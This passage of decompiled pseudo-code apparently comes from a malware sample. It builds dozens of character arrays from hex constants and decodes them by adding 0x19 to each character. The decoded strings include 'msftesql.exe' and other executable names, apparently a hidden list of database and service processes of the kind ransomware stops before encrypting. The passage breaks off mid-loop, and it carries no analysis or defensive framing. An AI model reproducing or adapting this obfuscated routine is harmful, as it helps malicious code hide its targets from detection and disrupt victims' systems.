				short _t702;
				short _t703;
				short _t705;
				short _t706;
				short _t707;
				short _t708;
				short _t709;
				short _t711;
				short _t712;
				short _t713;
				short _t714;
				short _t715;
				short _t716;
				short _t717;
				short _t718;
				short _t719;
				short _t720;
				short _t721;
				short _t723;
				short _t724;
				short _t725;
				short _t726;
				short _t727;
				short _t728;
				short _t729;
				short _t730;
				short _t731;
				short _t733;
				short _t734;
				short _t735;
				short _t736;
				short _t738;
				short _t739;
				short _t740;
				short _t741;
				short _t742;
				short _t743;
				short _t745;
				short _t746;
				short _t747;
				short _t748;
				short _t749;
				short _t750;
				short _t752;
				short _t753;
				short _t754;
				short _t755;
				short _t756;
				short _t758;
				short _t759;
				short _t760;
				short _t761;
				short _t762;
				short _t763;
				short _t764;
				short _t766;
				short _t767;
				short _t768;
				short _t769;
				short _t770;
				short _t771;
				short _t772;
				short _t774;
				short _t775;
				short _t776;
				short _t777;
				short _t778;
				short _t779;
				short _t780;
				short _t782;
				short _t783;
				short _t784;
				short _t785;
				short _t786;
				short _t787;
				short _t789;
				short _t790;
				short _t791;
				short _t792;
				short _t793;
				short _t794;
				short _t795;
				short _t796;
				short _t797;
				short _t798;
				short _t799;
				short _t800;
				short _t801;
				short _t803;
				short _t804;
				short _t805;
				short _t806;
				short _t807;
				short _t808;
				short _t809;
				short _t810;
				short _t812;
				short _t813;
				short _t814;
				short _t815;
				short _t817;
				short _t818;
				short _t819;
				short _t820;
				short _t821;
				short _t823;
				short _t824;
				short _t825;
				short _t826;
				short _t827;
				short _t828;
				short _t829;
				short _t830;
				short _t831;
				short _t832;
				short _t834;
				short _t835;
				short _t836;
				short _t837;
				short _t838;
				short _t839;
				short _t840;
				short _t841;
				short _t842;
				short _t843;
				short _t844;
				short _t846;
				short _t847;
				short _t848;
				short _t849;
				short _t850;
				short _t851;
				short _t853;
				short _t854;
				short _t855;
				short _t856;
				short _t857;
				short _t858;
				short _t859;
				short _t861;
				short _t862;
				short _t863;
				short _t864;
				short _t865;
				short _t866;
				short _t867;
				short _t868;
				short _t869;
				short _t871;
				short _t872;
				short _t873;
				short _t874;
				short _t875;
				short _t876;
				short _t877;
				short _t878;
				short _t879;
				short _t881;
				short _t882;
				short _t883;
				short _t884;
				short _t885;
				short _t886;
				short _t887;
				short _t888;
				short _t890;
				short _t891;
				short _t892;
				short _t893;
				short _t894;
				short _t895;
				short _t897;
				short _t898;
				short _t899;
				short _t900;
				short _t902;
				short _t903;
				short _t904;
				short _t905;
				short _t906;
				short _t907;
				short _t908;
				short _t910;
				short _t911;
				short _t913;
				short _t914;
				short _t915;
				short _t917;
				short _t918;
				short _t919;
				short _t921;
				short _t922;
				short _t923;
				short _t924;
				short _t925;
				short _t927;
				short _t928;
				short _t929;
				short _t930;
				short _t931;
				short _t932;
				short _t934;
				short _t935;
				short _t936;
				short _t937;
				short _t938;
				short _t939;
				short _t941;
				short _t942;
				short _t943;
				short _t944;
				short _t945;
				short _t947;
				short _t948;
				short _t949;
				short _t950;
				short _t951;
				short _t952;
				short _t954;
				short _t955;
				short _t956;
				short _t957;
				short _t958;
				short _t960;
				short _t961;
				short _t962;
				short _t964;
				short _t965;
				short _t966;
				short _t967;
				short _t968;
				short _t970;
				short _t971;
				short _t972;
				intOrPtr* _t1012;
				intOrPtr* _t1013;
				intOrPtr* _t1014;
				intOrPtr* _t1015;
				intOrPtr* _t1016;
				intOrPtr* _t1017;
				intOrPtr* _t1018;
				intOrPtr* _t1019;
				intOrPtr* _t1020;
				intOrPtr* _t1021;
				intOrPtr* _t1022;
				intOrPtr* _t1023;
				intOrPtr* _t1024;
				intOrPtr* _t1025;
				intOrPtr* _t1026;
				intOrPtr* _t1027;
				intOrPtr* _t1028;
				intOrPtr* _t1029;
				intOrPtr* _t1030;
				intOrPtr* _t1031;
				intOrPtr* _t1032;
				intOrPtr* _t1033;
				intOrPtr* _t1034;
				intOrPtr* _t1035;
				intOrPtr* _t1036;
				intOrPtr* _t1037;
				intOrPtr* _t1038;
				intOrPtr* _t1039;
				intOrPtr* _t1040;
				intOrPtr* _t1041;
				intOrPtr* _t1042;
				intOrPtr* _t1043;
				intOrPtr* _t1044;
				intOrPtr* _t1045;
				intOrPtr* _t1046;
				intOrPtr* _t1047;
				intOrPtr* _t1048;
				intOrPtr* _t1049;
				intOrPtr* _t1055;
				intOrPtr* _t1056;
				intOrPtr* _t1057;
				intOrPtr* _t1058;
				intOrPtr* _t1059;
				intOrPtr* _t1060;
				intOrPtr* _t1061;
				intOrPtr* _t1062;
				intOrPtr* _t1063;
				intOrPtr* _t1064;
				intOrPtr* _t1065;
				intOrPtr* _t1066;
				intOrPtr* _t1067;
				intOrPtr* _t1068;
				intOrPtr* _t1069;
				intOrPtr* _t1070;
				intOrPtr* _t1071;
				intOrPtr* _t1072;
				intOrPtr* _t1073;
				intOrPtr* _t1074;
				intOrPtr* _t1075;
				intOrPtr* _t1076;
				intOrPtr* _t1077;
				intOrPtr* _t1078;
				intOrPtr* _t1079;
				intOrPtr* _t1080;
				intOrPtr* _t1081;
				intOrPtr* _t1082;
				intOrPtr* _t1083;
				intOrPtr* _t1084;
				intOrPtr* _t1085;
				intOrPtr* _t1086;
				intOrPtr* _t1087;
				intOrPtr* _t1088;
				intOrPtr* _t1089;
				intOrPtr* _t1090;
				intOrPtr* _t1091;
				intOrPtr* _t1092;
				intOrPtr* _t1095;
				short _t1100;
				short _t1101;
				short _t1102;
				short _t1103;
				short _t1104;
				short _t1106;
				short _t1107;
				short _t1108;
				short _t1109;
				short _t1110;
				short _t1111;
				short _t1112;
				short _t1113;
				short _t1114;
				short _t1115;
				short _t1116;
				short _t1117;
				short _t1118;
				short _t1119;
				void* _t1120;
				void* _t1125;
				short _t1131;
				short _t1132;
				short _t1133;
				short _t1134;
				short _t1135;
				short _t1136;
				short _t1137;
				short _t1138;
				short _t1139;
				short _t1140;
				short _t1141;
				void* _t1142;
				short _t1144;
				short _t1145;
				short _t1146;
				short _t1147;
				short _t1148;
				short _t1149;
				short _t1150;
				short _t1151;
				short _t1152;
				short _t1153;
				short _t1154;
				short _t1155;
				short _t1156;
				short _t1157;
				short _t1158;
				short _t1159;
				short _t1160;
				short _t1161;
				signed int _t1162;
				short _t1163;
				short _t1164;
				short _t1165;
				short _t1166;
				short _t1167;
				short _t1168;
				short _t1169;
				short _t1170;
				short _t1171;
				short _t1172;
				short _t1173;
				short _t1174;
				short _t1175;
				short _t1176;
				short _t1177;
				short _t1178;
				short _t1179;
				short _t1180;
				short _t1181;
				short _t1182;
				short _t1183;
				short _t1184;
				void* _t1186;
				void* _t1187;

				_t701 = 0x54;
				_t1144 = 0x5a;
				_t1163 = 0x4d;
				_t1100 = 0x5b;
				_v488 = _t1163;
				_t1164 = 0x4c;
				_t1106 = 0x58;
				_t1131 = 0x53;
				_v492 = _t701;
				_t702 = 0x15;
				_v476 = _t702;
				_v484 = _t1164;
				_v474 = _t1164;
				_t1165 = 0x5f;
				_t703 = 0x4c;
				_v470 = _t703;
				_v468 = 0;
				_t705 = 0x48;
				_v514 = _t705;
				_v490 = _t1144;
				_v482 = _t1144;
				_v520 = _t1144;
				_t1145 = 0x4e;
				_t706 = 0x4c;
				_v510 = _t706;
				_t707 = 0x55;
				_v508 = _t707;
				_t708 = 0x15;
				_v504 = _t708;
				_t709 = 0x4c;
				_v502 = _t709;
				_v498 = _t709;
				_v496 = 0;
				_t711 = 0x5a;
				_v472 = _t1165;
				_v500 = _t1165;
				_t1166 = 0x49;
				_v796 = _t711;
				_t712 = 0x59;
				_v788 = _t712;
				_t713 = 0x56;
				_v786 = _t713;
				_t714 = 0x5e;
				_v486 = _t1100;
				_v480 = _t1106;
				_v478 = _t1131;
				_v518 = _t1106;
				_v516 = _t1131;
				_v512 = _t1145;
				_v506 = _t1100;
				_v794 = _t1106;
				_v792 = _t1131;
				_v790 = _t1166;
				_v784 = _t714;
				_t715 = 0x5a;
				_v782 = _t715;
				_t716 = 0x4c;
				_v780 = _t716;
				_t717 = 0x59;
				_v778 = _t717;
				_t718 = 0x15;
				_v776 = _t718;
				_t719 = 0x4c;
				_v774 = _t719;
				_t720 = 0x5f;
				_v772 = _t720;
				_t721 = 0x4c;
				_v770 = _t721;
				_v768 = 0;
				_t723 = 0x5a;
				_v692 = _t723;
				_t724 = 0x5e;
				_v686 = _t724;
				_t725 = 0x59;
				_v684 = _t725;
				_t726 = 0x50;
				_v682 = _t726;
				_t727 = 0x4c;
				_v678 = _t727;
				_v680 = _t1100;
				_t1101 = 0x59;
				_t728 = 0x15;
				_v674 = _t728;
				_t729 = 0x4c;
				_v672 = _t729;
				_t730 = 0x5f;
				_v670 = _t730;
				_t731 = 0x4c;
				_v668 = _t731;
				_v666 = 0;
				_t733 = 0x56;
				_v172 = _t733;
				_t734 = 0x48;
				_v676 = _t1101;
				_v170 = _t1101;
				_t1102 = 0x4a;
				_v688 = _t1131;
				_v164 = _t1131;
				_t1132 = 0x4c;
				_v168 = _t734;
				_t735 = 0x15;
				_v160 = _t735;
				_t736 = 0x5f;
				_v156 = _t736;
				_v690 = _t1106;
				_v166 = _t1102;
				_v162 = _t1132;
				_v158 = _t1132;
				_v154 = _t1132;
				_v152 = 0;
				_t738 = 0x56;
				_v28 = _t738;
				_t739 = 0x5a;
				_t1133 = 0x4b;
				_v24 = _t739;
				_v22 = _t739;
				_t740 = 0x15;
				_v18 = _t740;
				_t741 = 0x4c;
				_v16 = _t741;
				_t742 = 0x5f;
				_v14 = _t742;
				_t743 = 0x4c;
				_v12 = _t743;
				_v10 = 0;
				_v20 = _t1133;
				_v196 = _t1133;
				_t1134 = 0x5a;
				_t745 = 0x55;
				_v190 = _t745;
				_v194 = _t1166;
				_t1167 = 0x54;
				_t746 = 0x57;
				_v186 = _t746;
				_t747 = 0x15;
				_v184 = _t747;
				_t748 = 0x4c;
				_v182 = _t748;
				_t749 = 0x5f;
				_v180 = _t749;
				_t750 = 0x4c;
				_v178 = _t750;
				_v176 = 0;
				_v192 = _t1134;
				_v464 = _t1134;
				_t1135 = 0x60;
				_t752 = 0x55;
				_v460 = _t752;
				_t753 = 0x5b;
				_v456 = _t753;
				_t754 = 0x50;
				_v188 = _t1167;
				_v452 = _t1167;
				_t1168 = 0x4c;
				_v454 = _t754;
				_t755 = 0x15;
				_v448 = _t755;
				_t756 = 0x5f;
				_v444 = _t756;
				_v26 = _t1102;
				_v462 = _t1135;
				_v458 = _t1102;
				_v450 = _t1168;
				_v446 = _t1168;
				_v442 = _t1168;
				_v440 = 0;
				_t758 = 0x48;
				_v296 = _t758;
				_t759 = 0x55;
				_v292 = _t759;
				_v294 = _t1145;
				_t1146 = 0x5b;
				_t1169 = 0x5a;
				_t760 = 0x5d;
				_v286 = _t760;
				_t761 = 0x15;
				_v282 = _t761;
				_t762 = 0x4c;
				_v280 = _t762;
				_t763 = 0x5f;
				_v278 = _t763;
				_t764 = 0x4c;
				_v276 = _t764;
				_v274 = 0;
				_t766 = 0x50;
				_v896 = _t766;
				_t767 = 0x53;
				_v288 = _t1169;
				_v894 = _t1169;
				_t1170 = 0x57;
				_v890 = _t767;
				_v886 = _t767;
				_t768 = 0x5c;
				_v884 = _t768;
				_t769 = 0x5a;
				_v882 = _t769;
				_v880 = _t769;
				_t770 = 0x5d;
				_v878 = _t770;
				_t771 = 0x15;
				_v874 = _t771;
				_t772 = 0x4c;
				_v888 = _t1170;
				_t1171 = 0x5f;
				_v872 = _t772;
				_v870 = _t1171;
				_v868 = _t772;
				_v724 = _t1171;
				_t1172 = 0x4d;
				_v866 = 0;
				_t774 = 0x5a;
				_v722 = _t1172;
				_t1173 = 0x5d;
				_v720 = _t774;
				_v718 = _t774;
				_v290 = _t1146;
				_v284 = _t1102;
				_v892 = _t1106;
				_v876 = _t1102;
				_v716 = _t1173;
				_v714 = _t1102;
				_v712 = _t1102;
				_t775 = 0x56;
				_v710 = _t775;
				_t776 = 0x55;
				_v708 = _t776;
				_t777 = 0x15;
				_v706 = _t777;
				_t778 = 0x4c;
				_v704 = _t778;
				_t779 = 0x5f;
				_v702 = _t779;
				_t780 = 0x4c;
				_v700 = _t780;
				_v698 = 0;
				_t782 = 0x5a;
				_v548 = _t782;
				_t783 = 0x53;
				_v544 = _t783;
				_t784 = 0x5a;
				_v542 = _t784;
				_t785 = 0x4c;
				_v540 = _t785;
				_t786 = 0x59;
				_v538 = _t786;
				_v534 = _t786;
				_v546 = _t1106;
				_t1107 = 0x15;
				_v536 = _t1173;
				_t1174 = 0x4c;
				_t787 = 0x5f;
				_v528 = _t787;
				_v524 = 0;
				_t789 = 0x54;
				_v1128 = _t789;
				_t790 = 0x4b;
				_v1124 = _t790;
				_t791 = 0x5a;
				_v1120 = _t791;
				_v530 = _t1174;
				_v526 = _t1174;
				_v1122 = _t1174;
				_t1175 = 0x52;
				_t792 = 0x56;
				_v1114 = _t792;
				_t793 = 0x57;
				_v1112 = _t793;
				_t794 = 0x5a;
				_v1110 = _t794;
				_t795 = 0x4c;
				_v1108 = _t795;
				_t796 = 0x59;
				_v1106 = _t796;
				_t797 = 0x5d;
				_v532 = _t1107;
				_v1126 = _t1135;
				_v1118 = _t1175;
				_v1116 = _t1146;
				_v1104 = _t797;
				_t798 = 0x50;
				_v1102 = _t798;
				_t799 = 0x4c;
				_v1098 = _t799;
				_v1094 = _t799;
				_t800 = 0x5f;
				_v1092 = _t800;
				_t801 = 0x4c;
				_v1090 = _t801;
				_v1088 = 0;
				_t803 = 0x56;
				_v828 = _t803;
				_t804 = 0x48;
				_v824 = _t804;
				_t805 = 0x5c;
				_v822 = _t805;
				_v816 = _t805;
				_v820 = _t1146;
				_t1147 = 0x56;
				_t806 = 0x57;
				_v814 = _t806;
				_t807 = 0x4b;
				_v812 = _t807;
				_v818 = _t1147;
				_t1148 = 0x5a;
				_t808 = 0x4c;
				_v806 = _t808;
				_t809 = 0x5f;
				_v804 = _t809;
				_t810 = 0x4c;
				_v802 = _t810;
				_v800 = 0;
				_t812 = 0x4c;
				_v220 = _t812;
				_t813 = 0x55;
				_v218 = _t813;
				_t814 = 0x5d;
				_v1096 = _t1107;
				_v808 = _t1107;
				_v208 = _t1107;
				_t1108 = 0x4c;
				_v212 = _t814;
				_t815 = 0x5f;
				_v204 = _t815;
				_v200 = 0;
				_t817 = 0x4d;
				_v810 = _t1148;
				_v214 = _t1148;
				_t1149 = 0x50;
				_v1100 = _t1102;
				_v826 = _t1102;
				_v216 = _t1102;
				_v210 = _t1102;
				_v206 = _t1108;
				_v202 = _t1108;
				_v1044 = _t817;
				_v1042 = _t1149;
				_t1150 = 0x59;
				_v1036 = _t817;
				_v1024 = _t817;
				_v1040 = _t1150;
				_t1151 = 0x56;
				_v1038 = _t1108;
				_t1109 = 0x5f;
				_v1034 = _t1151;
				_v1028 = _t1151;
				_t1152 = 0x55;
				_t818 = 0x50;
				_v1022 = _t818;
				_v1026 = _t1152;
				_t1153 = 0x4e;
				_v1032 = _t1109;
				_t1110 = 0x15;
				_t819 = 0x4c;
				_v1016 = _t819;
				_t820 = 0x5f;
				_v1014 = _t820;
				_t821 = 0x4c;
				_v1012 = _t821;
				_v1010 = 0;
				_t823 = 0x5b;
				_v932 = _t823;
				_t824 = 0x49;
				_v930 = _t824;
				_t825 = 0x50;
				_v928 = _t825;
				_t826 = 0x59;
				_v926 = _t826;
				_t827 = 0x4b;
				_v924 = _t827;
				_t828 = 0x56;
				_v920 = _t828;
				_t829 = 0x55;
				_v918 = _t829;
				_t830 = 0x4d;
				_v916 = _t830;
				_t831 = 0x50;
				_v1018 = _t1110;
				_v910 = _t1110;
				_t1111 = 0x4c;
				_v914 = _t831;
				_t832 = 0x5f;
				_v906 = _t832;
				_v902 = 0;
				_t834 = 0x54;
				_v1030 = _t1102;
				_v1020 = _t1153;
				_v922 = _t1102;
				_v912 = _t1153;
				_v908 = _t1111;
				_v904 = _t1111;
				_v1004 = _t834;
				_v1002 = _t1135;
				_t835 = 0x4b;
				_v1000 = _t835;
				_t836 = 0x5a;
				_v996 = _t836;
				_t837 = 0x5b;
				_v992 = _t837;
				_t838 = 0x56;
				_v990 = _t838;
				_t839 = 0x57;
				_v988 = _t839;
				_v998 = _t1111;
				_t1112 = 0x58;
				_t840 = 0x56;
				_v984 = _t840;
				_v994 = _t1175;
				_t1176 = 0x5a;
				_t841 = 0x15;
				_v980 = _t841;
				_t842 = 0x4c;
				_v978 = _t842;
				_t843 = 0x5f;
				_v976 = _t843;
				_t844 = 0x4c;
				_v974 = _t844;
				_v972 = 0;
				_t846 = 0x56;
				_v52 = _t846;
				_v48 = _t846;
				_t847 = 0x54;
				_v46 = _t847;
				_v44 = _t847;
				_t848 = 0x15;
				_v42 = _t848;
				_t849 = 0x4c;
				_v40 = _t849;
				_t850 = 0x5f;
				_v38 = _t850;
				_t851 = 0x4c;
				_v36 = _t851;
				_v34 = 0;
				_t853 = 0x54;
				_v244 = _t853;
				_t854 = 0x53;
				_v236 = _t854;
				_t855 = 0x4b;
				_v234 = _t855;
				_t856 = 0x15;
				_v232 = _t856;
				_t857 = 0x4c;
				_v986 = _t1112;
				_v982 = _t1176;
				_v50 = _t1102;
				_v242 = _t1135;
				_v240 = _t1176;
				_v238 = _t1112;
				_v230 = _t857;
				_t858 = 0x5f;
				_v228 = _t858;
				_t859 = 0x4c;
				_v226 = _t859;
				_v224 = 0;
				_t861 = 0x54;
				_v756 = _t861;
				_t862 = 0x53;
				_v748 = _t862;
				_t863 = 0x4b;
				_v746 = _t863;
				_v750 = _t1112;
				_t1113 = 0x14;
				_t864 = 0x55;
				_v742 = _t864;
				_t865 = 0x5b;
				_v740 = _t865;
				_t866 = 0x15;
				_v738 = _t866;
				_t867 = 0x4c;
				_v736 = _t867;
				_t868 = 0x5f;
				_v734 = _t868;
				_t869 = 0x4c;
				_v732 = _t869;
				_v730 = 0;
				_t871 = 0x54;
				_v860 = _t871;
				_v754 = _t1135;
				_v858 = _t1135;
				_t1136 = 0x58;
				_t872 = 0x53;
				_v852 = _t872;
				_t873 = 0x4b;
				_v850 = _t873;
				_t874 = 0x56;
				_v846 = _t874;
				_v744 = _t1113;
				_v848 = _t1113;
				_t1114 = 0x57;
				_t875 = 0x5b;
				_v842 = _t875;
				_t876 = 0x15;
				_v840 = _t876;
				_t877 = 0x4c;
				_v838 = _t877;
				_t878 = 0x5f;
				_v836 = _t878;
				_t879 = 0x4c;
				_v834 = _t879;
				_v752 = _t1176;
				_v856 = _t1176;
				_v854 = _t1136;
				_v844 = _t1114;
				_v832 = 0;
				_t881 = 0x4b;
				_v324 = _t881;
				_t882 = 0x49;
				_v322 = _t882;
				_t883 = 0x4c;
				_v320 = _t883;
				_t884 = 0x55;
				_v318 = _t884;
				_t885 = 0x1c;
				_v314 = _t885;
				_t886 = 0x17;
				_v312 = _t886;
				_t887 = 0x15;
				_v310 = _t887;
				_v316 = _t1153;
				_t1154 = 0x4c;
				_t888 = 0x5f;
				_v306 = _t888;
				_v302 = 0;
				_t890 = 0x49;
				_v1080 = _t890;
				_t891 = 0x56;
				_v1076 = _t891;
				_t892 = 0x59;
				_v308 = _t1154;
				_v304 = _t1154;
				_v1072 = _t1154;
				_v1068 = _t1154;
				_t1155 = 0x5d;
				_v1074 = _t892;
				_v1066 = _t892;
				_v1082 = _t1136;
				_t1137 = 0x50;
				_t893 = 0x4c;
				_v1058 = _t893;
				_t894 = 0x15;
				_v1056 = _t894;
				_t895 = 0x4c;
				_v1054 = _t895;
				_v1050 = _t895;
				_v1064 = _t1155;
				_t1156 = 0x5f;
				_v1048 = 0;
				_t897 = 0x4c;
				_v76 = _t897;
				_v70 = _t897;
				_t898 = 0x53;
				_v68 = _t898;
				_t899 = 0x15;
				_v1084 = _t1176;
				_v1078 = _t1102;
				_v1070 = _t1176;
				_v1062 = _t1137;
				_v1060 = _t1102;
				_v1052 = _t1156;
				_v74 = _t1156;
				_v72 = _t1102;
				_v66 = _t899;
				_t900 = 0x4c;
				_v64 = _t900;
				_v60 = _t900;
				_v58 = 0;
				_t902 = 0x55;
				_v574 = _t902;
				_t903 = 0x4d;
				_v572 = _t903;
				_t904 = 0x56;
				_v570 = _t904;
				_t905 = 0x48;
				_v566 = _t905;
				_t906 = 0x5b;
				_v564 = _t906;
				_v568 = _t1114;
				_t1115 = 0x4f;
				_t907 = 0x15;
				_v560 = _t907;
				_t908 = 0x4c;
				_v558 = _t908;
				_v554 = _t908;
				_v552 = 0;
				_v576 = _t1137;
				_t1138 = 0x54;
				_t910 = 0x48;
				_v600 = _t910;
				_v598 = _t1102;
				_v596 = _t1102;
				_t1103 = 0x4c;
				_t911 = 0x15;
				_v594 = _t1103;
				_v588 = _t911;
				_v586 = _t1103;
				_v582 = _t1103;
				_t1104 = 0x57;
				_v604 = _t1138;
				_v580 = 0;
				_v100 = _t1138;
				_t1139 = 0x5c;
				_t913 = 0x49;
				_v92 = _t913;
				_t914 = 0x15;
				_v90 = _t914;
				_t915 = 0x4c;
				_v88 = _t915;
				_v84 = _t915;
				_v82 = 0;
				_v62 = _t1156;
				_v562 = _t1115;
				_v556 = _t1156;
				_v602 = _t1176;
				_v592 = _t1176;
				_v590 = _t1176;
				_v584 = _t1156;
				_v98 = _t1176;
				_v96 = _t1104;
				_v94 = _t1139;
				_v86 = _t1156;
				_t917 = 0x56;
				_t1177 = 0x55;
				_t1116 = 0x4c;
				_v352 = _t917;
				_v344 = _t917;
				_t918 = 0x5b;
				_v342 = _t918;
				_v350 = _t1177;
				_v346 = _t1177;
				_t1178 = _t1116;
				_t919 = 0x15;
				_v338 = _t919;
				_v330 = 0;
				_t921 = 0x56;
				_v380 = _t921;
				_t922 = 0x5b;
				_v376 = _t922;
				_t923 = 0x53;
				_v374 = _t923;
				_t924 = 0x56;
				_v372 = _t924;
				_v370 = _t924;
				_v340 = _t1178;
				_v336 = _t1178;
				_v332 = _t1178;
				_t1179 = 0x52;
				_t925 = 0x15;
				_v366 = _t925;
				_v358 = 0;
				_v368 = _t1179;
				_t1180 = _t1116;
				_t927 = 0x56;
				_v630 = _t927;
				_t928 = 0x5e;
				_v628 = _t928;
				_t929 = 0x59;
				_v624 = _t929;
				_t930 = 0x55;
				_v364 = _t1180;
				_v360 = _t1180;
				_v626 = _t1180;
				_t1181 = 0x5b;
				_v620 = _t930;
				_t931 = 0x15;
				_v616 = _t931;
				_t932 = _t1116;
				_v614 = _t932;
				_v610 = _t932;
				_v608 = 0;
				_t934 = 0x5a;
				_v348 = _t1116;
				_v334 = _t1156;
				_v378 = _t1139;
				_v362 = _t1156;
				_v632 = _t1104;
				_v622 = _t1104;
				_v618 = _t1181;
				_v612 = _t1156;
				_v124 = _t934;
				_t935 = _t1116;
				_v120 = _t935;
				_t936 = 0x48;
				_v118 = _t936;
				_t937 = 0x54;
				_v116 = _t937;
				_t938 = 0x15;
				_v114 = _t938;
				_t939 = _t1116;
				_t1117 = 0x4f;
				_v112 = _t939;
				_v108 = _t939;
				_v106 = 0;
				_t941 = 0x4c;
				_v264 = _t941;
				_v122 = _t1181;
				_v268 = _t1181;
				_t1182 = 0x49;
				_t942 = 0x48;
				_v260 = _t942;
				_t943 = 0x5b;
				_v258 = _t943;
				_t944 = 0x15;
				_v256 = _t944;
				_t945 = 0x4c;
				_v254 = _t945;
				_v250 = _t945;
				_v248 = 0;
				_t947 = 0x5b;
				_v110 = _t1156;
				_v252 = _t1156;
				_t1157 = 0x4c;
				_v660 = _t947;
				_v650 = _t947;
				_v656 = _t1157;
				_t1158 = 0x48;
				_t948 = 0x1d;
				_v648 = _t948;
				_t949 = 0x1b;
				_v652 = _t1158;
				_t1159 = 0x15;
				_v646 = _t949;
				_t950 = 0x4c;
				_v642 = _t950;
				_t951 = 0x5f;
				_v640 = _t951;
				_t952 = 0x4c;
				_v638 = _t952;
				_v636 = 0;
				_t954 = 0x5b;
				_v266 = _t1117;
				_v262 = _t1182;
				_v658 = _t1117;
				_v654 = _t1182;
				_v644 = _t1159;
				_v968 = _t954;
				_t955 = 0x55;
				_v962 = _t955;
				_v966 = _t1117;
				_t1118 = 0x4b;
				_t956 = 0x4c;
				_v958 = _t956;
				_t957 = 0x59;
				_v956 = _t957;
				_v950 = _t957;
				_v964 = _t1139;
				_t1140 = 0x50;
				_t958 = 0x4c;
				_v944 = _t958;
				_v940 = _t958;
				_v954 = _t1182;
				_t1183 = 0x5f;
				_v938 = 0;
				_v946 = _t1159;
				_t1160 = 0x5d;
				_t960 = 0x5a;
				_v144 = _t960;
				_v148 = _t1160;
				_t1161 = 0x56;
				_t961 = 0x15;
				_v138 = _t961;
				_t962 = 0x4c;
				_v136 = _t962;
				_v132 = _t962;
				_v130 = 0;
				_v942 = _t1183;
				_v134 = _t1183;
				_t1184 = 0x5e;
				_t964 = 0x55;
				_v952 = _t1140;
				_v146 = _t1140;
				_v142 = _t1140;
				_v406 = _t1140;
				_t1141 = 0x59;
				_v404 = _t964;
				_t965 = 0x15;
				_v394 = _t965;
				_t966 = 0x4c;
				_v392 = _t966;
				_t967 = 0x5f;
				_v390 = _t967;
				_t968 = 0x4c;
				_v388 = _t968;
				_v960 = _t1118;
				_v948 = _t1118;
				_v140 = _t1161;
				_v408 = _t1184;
				_v402 = _t1184;
				_v400 = _t1161;
				_v398 = _t1141;
				_v396 = _t1118;
				_v386 = 0;
				_v436 = _t1184;
				_v434 = _t1161;
				_v432 = _t1141;
				_t970 = 0x48;
				_v426 = _t970;
				_t971 = 0x15;
				_v422 = _t971;
				_v430 = _t1118;
				_v424 = _t1118;
				_t1119 = 0x4c;
				_t972 = 0x5f;
				_v418 = _t972;
				_v414 = 0;
				_v1280 =  &_v492;
				_v1276 =  &_v520;
				_v1272 =  &_v796;
				_v1268 =  &_v692;
				_v1264 =  &_v172;
				_v1260 =  &_v28;
				_v1256 =  &_v196;
				_v1252 =  &_v464;
				_v1248 =  &_v296;
				_v1244 =  &_v896;
				_v1240 =  &_v724;
				_v1236 =  &_v548;
				_v1232 =  &_v1128;
				_v1228 =  &_v828;
				_v1224 =  &_v220;
				_v1220 =  &_v1044;
				_v1216 =  &_v932;
				_v1212 =  &_v1004;
				_v1208 =  &_v52;
				_v1204 =  &_v244;
				_v1200 =  &_v756;
				_v1196 =  &_v860;
				_v1192 =  &_v324;
				_v1188 =  &_v1084;
				_v1184 =  &_v76;
				_v1180 =  &_v576;
				_v1176 =  &_v604;
				_v1172 =  &_v100;
				_v1168 =  &_v352;
				_v1164 =  &_v380;
				_v1160 =  &_v632;
				_v428 = _t1104;
				_v420 = _t1119;
				_v416 = _t1119;
				_v1156 =  &_v124;
				_v1152 =  &_v268;
				_v1148 =  &_v660;
				_v1144 =  &_v968;
				_v1140 =  &_v148;
				_v1136 =  &_v408;
				_t1142 = 0x19;
				_v1132 =  &_v436;
				_t1012 =  &_v492;
				_t1120 = 2;
				do {
					 *_t1012 =  *_t1012 + _t1142;
					_t1012 = _t1012 + _t1120;
				} while ( *_t1012 != 0);
				_t1013 =  &_v520;
				do {
					 *_t1013 =  *_t1013 + _t1142;
					_t1013 = _t1013 + _t1120;
				} while ( *_t1013 != 0);
				_t1014 =  &_v796;
				do {
					 *_t1014 =  *_t1014 + _t1142;
					_t1014 = _t1014 + _t1120;
				} while ( *_t1014 != 0);
				_t1015 =  &_v692;
				do {
					 *_t1015 =  *_t1015 + _t1142;
					_t1015 = _t1015 + _t1120;
				} while ( *_t1015 != 0);
				_t1016 =  &_v172;
				do {
					 *_t1016 =  *_t1016 + _t1142;
					_t1016 = _t1016 + _t1120;
				} while ( *_t1016 != 0);
				_t1017 =  &_v28;
				do {
					 *_t1017 =  *_t1017 + _t1142;
					_t1017 = _t1017 + _t1120;
				} while ( *_t1017 != 0);
				_t1018 =  &_v196;
				do {
					 *_t1018 =  *_t1018 + _t1142;
					_t1018 = _t1018 + _t1120;
				} while ( *_t1018 != 0);
				_t1019 =  &_v464;
				do {
					 *_t1019 =  *_t1019 + _t1142;
					_t1019 = _t1019 + _t1120;
				} while ( *_t1019 != 0);
				_t1020 =  &_v296;
				do {
					 *_t1020 =  *_t1020 + _t1142;
					_t1020 = _t1020 + _t1120;
				} while ( *_t1020 != 0);
				_t1021 =  &_v896;
				do {
					 *_t1021 =  *_t1021 + _t1142;
					_t1021 = _t1021 + _t1120;
				} while ( *_t1021 != 0);
				_t1022 =  &_v724;
				do {
					 *_t1022 =  *_t1022 + _t1142;
					_t1022 = _t1022 + _t1120;
				} while ( *_t1022 != 0);
				_t1023 =  &_v548;
				do {
					 *_t1023 =  *_t1023 + _t1142;
					_t1023 = _t1023 + _t1120;
				} while ( *_t1023 != 0);
				_t1024 =  &_v1128;
				do {
					 *_t1024 =  *_t1024 + _t1142;
					_t1024 = _t1024 + _t1120;
				} while ( *_t1024 != 0);
				_t1025 =  &_v828;
				do {
					 *_t1025 =  *_t1025 + _t1142;
					_t1025 = _t1025 + _t1120;
				} while ( *_t1025 != 0);
				_t1026 =  &_v220;
				do {
					 *_t1026 =  *_t1026 + _t1142;
					_t1026 = _t1026 + _t1120;
				} while ( *_t1026 != 0);
				_t1027 =  &_v1044;
				do {
					 *_t1027 =  *_t1027 + _t1142;
					_t1027 = _t1027 + _t1120;
				} while ( *_t1027 != 0);
				_t1028 =  &_v932;
				do {
					 *_t1028 =  *_t1028 + _t1142;
					_t1028 = _t1028 + _t1120;
				} while ( *_t1028 != 0);
				_t1029 =  &_v1004;
				do {
					 *_t1029 =  *_t1029 + _t1142;
					_t1029 = _t1029 + _t1120;
				} while ( *_t1029 != 0);
				_t1030 =  &_v52;
				do {
					 *_t1030 =  *_t1030 + _t1142;
					_t1030 = _t1030 + _t1120;
				} while ( *_t1030 != 0);
				_t1031 =  &_v244;
				do {
